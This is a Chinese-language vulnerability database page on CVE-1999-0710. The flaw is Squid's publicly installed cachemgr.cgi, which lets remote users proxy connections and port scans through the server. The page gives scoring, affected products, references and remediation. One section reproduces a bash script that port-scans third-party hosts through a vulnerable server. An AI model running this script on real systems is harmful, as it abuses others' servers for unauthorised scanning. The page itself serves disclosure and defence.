CVE-1999-0710
CVSS7.5
发布时间 :1999-07-25 00:00:00
修订时间 :2008-09-09 08:35:15
NMCOES    

[原文]The Squid package in Red Hat Linux 5.2 and 6.0, and other distributions, installs cachemgr.cgi in a public web directory, which allows remote attackers to use it as an intermediary to connect to other systems.


[CNNVD]Squid cachemgr.cgi非法链接漏洞(CNNVD-199907-029)

        Red Hat Linux 5.2与6.0版本以及其他发行版本的Squid程序包存在漏洞。Squid程序包在公共网络目录中安装cachemgr.cgi,远程攻击者将其用作连接其它系统的媒介。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:redhat:linux:6.0Red Hat Linux 6.0
cpe:/o:redhat:linux:5.2Red Hat Linux 5.2

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:10071The Squid package in Red Hat Linux 5.2 and 6.0, and other distributions, installs cachemgr.cgi in a public web directory, which allows remot...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0710
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0710
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199907-029
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/2385
(UNKNOWN)  XF  http-cgi-cachemgr(2385)
http://www.securityfocus.com/bid/2059
(UNKNOWN)  BID  2059
http://www.redhat.com/support/errata/RHSA-2005-489.html
(UNKNOWN)  REDHAT  RHSA-2005:489
http://www.redhat.com/support/errata/RHSA-1999-025.html
(UNKNOWN)  REDHAT  RHSA-1999:025
http://www.redhat.com/support/errata/archives/rh52-errata-general.html#squid
(UNKNOWN)  CONFIRM  http://www.redhat.com/support/errata/archives/rh52-errata-general.html#squid
http://www.redhat.com/archives/fedora-announce-list/2005-May/msg00025.html
(UNKNOWN)  FEDORA  FEDORA-2005-373
http://www.debian.org/security/2004/dsa-576
(UNKNOWN)  DEBIAN  DSA-576
http://fedoranews.org/updates/FEDORA--.shtml
(UNKNOWN)  FEDORA  FLSA-2006:152809

- 漏洞信息

Squid cachemgr.cgi非法链接漏洞
高危 设计错误
1999-07-25 00:00:00 2006-11-16 00:00:00
远程※本地  
        Red Hat Linux 5.2与6.0版本以及其他发行版本的Squid程序包存在漏洞。Squid程序包在公共网络目录中安装cachemgr.cgi,远程攻击者将其用作连接其它系统的媒介。

- 公告与补丁

        Please see the referenced vendor advisories for more information and fixes.
        National Science Foundation Squid Web Proxy 2.2
        

- 漏洞信息 (20465)

Squid Web Proxy 2.2 cachemgr.cgi Unauthorized Connection Vulnerability (EDBID:20465)
cgi remote
1999-07-23 Verified
0 fsaa
N/A [点击下载]
source: http://www.securityfocus.com/bid/2059/info

The 'cachemgr.cgi' module is a management interface for the Squid proxy service. It was installed by default in '/cgi-bin' by Red Hat Linux 5.2 and 6.0 installed with Squid. This script prompts for a host and port, which it then tries to connect to. If a webserver such as Apache is running, this can be used to connect to arbitrary hosts and ports, allowing for potential use as an intermediary in denial-of-service attacks, proxied port scans, etc. Interpreting the output of the script can allow the attacker to determine whether or not a connection was established. 

#!/bin/bash -x

# Port scanning using a misconfigured squid
# using open apache

# Usage miscachemgr host_vuln host_to_scan end_port

# Concept: Jacobo Van Leeuwen & Francisco S�a Mu�oz
# Coded by Francisco S�a Mu�oz
# IP6 [Logic Control]

PORT=1
ONE='/cgi-bin/cachemgr.cgi?host='
TWO='&port='
THREE='&user_name=&operation&auth='

mkdir from_$1_to_$2

while [ $PORT -lt $3 ]; do

# lynx -dump http://$1/cgi-bin/cachemgr.cgi?host=\
# $2&port=$PORT&user_name=&operation=authenticate&auth= > \
# port_$1_to_$2/$PORT.log 2>&1

lynx -dump http://$1$ONE$2$TWO$PORT$THREE > from_$1_to_$2/$PORT.log 2>&1
let PORT=PORT+1

done
		

- 漏洞信息

28
Squid cachemgr.cgi Proxied Port Scanning Weakness
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

This host is running the Squid Proxy server 'cachemanager' CGI. The cache manager CGI program, by default, contains no restricts or access permissions. With a malformed request, an intruder can use this script to launch port scans from the server.

- 时间线

1999-07-23 Unknow
1999-07-23 Unknow

- 解决方案

If you are not using the system as a Squid WWW Proxy/Cache server, then uninstall the package by executing: '/etc/rc.d/init.d/squid stop ; rpm -e squid'. If you want to continue using the Squid proxy server software, take the following restrict access to the manager interface: 'mkdir /home/httpd/protected-cgi-bin', 'mv /home/httpd/cgi- bin/cachemgr.cgi /home/httpd/protected-cgi-bin/', and add the following directives to /etc/httpd/conf/access.conf and srm.conf: (Add the following to access.conf ) order deny,allow deny from all allow from localhost AllowOverride None Options ExecCGI (Add the following to srm.conf) ScriptAlias /protected-cgi- bin/ /home/httpd/protected-cgi-bin/

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Squid cachemgr.cgi Unauthorized Connection Vulnerability
Design Error 2059
Yes Yes
1999-07-23 12:00:00 2006-02-21 09:57:00
Posted to BugTraq July 23, 1999 by < daniel@news.gus.net >

- 受影响的程序版本

SGI ProPack 3.0 SP5
RedHat Linux 9.0 i386
RedHat Linux 7.3 i386
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux ES 3
RedHat Desktop 4.0
RedHat Desktop 3.0
RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
Red Hat Fedora Core3
Red Hat Fedora Core2
Red Hat Fedora Core1
Red Hat Enterprise Linux AS 4
Red Hat Enterprise Linux AS 3
National Science Foundation Squid Web Proxy 2.2
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0 alpha
- RedHat Linux 6.0
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 alpha
Debian Linux 3.0 sparc
Debian Linux 3.0 s/390
Debian Linux 3.0 ppc
Debian Linux 3.0 mipsel
Debian Linux 3.0 mips
Debian Linux 3.0 m68k
Debian Linux 3.0 ia-64
Debian Linux 3.0 ia-32
Debian Linux 3.0 hppa
Debian Linux 3.0 arm
Debian Linux 3.0 alpha
Debian Linux 3.0

- 漏洞讨论

The 'cachemgr.cgi' module is a management interface for the Squid proxy service. It was installed by default in '/cgi-bin' by Red Hat Linux 5.2 and 6.0 installed with Squid. This script prompts for a host and port, which it then tries to connect to. If a webserver such as Apache is running, this can be used to connect to arbitrary hosts and ports, allowing for potential use as an intermediary in denial-of-service attacks, proxied port scans, etc. Interpreting the output of the script can allow the attacker to determine whether or not a connection was established.

- 漏洞利用

http://target.host/cgi-bin/cachemgr.cgi

An automated scanner exploit has been provided by Francisco Sáa Muñoz <fsaa@ip6seguridad.com>:

- 解决方案

Please see the referenced vendor advisories for more information and fixes.


National Science Foundation Squid Web Proxy 2.2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站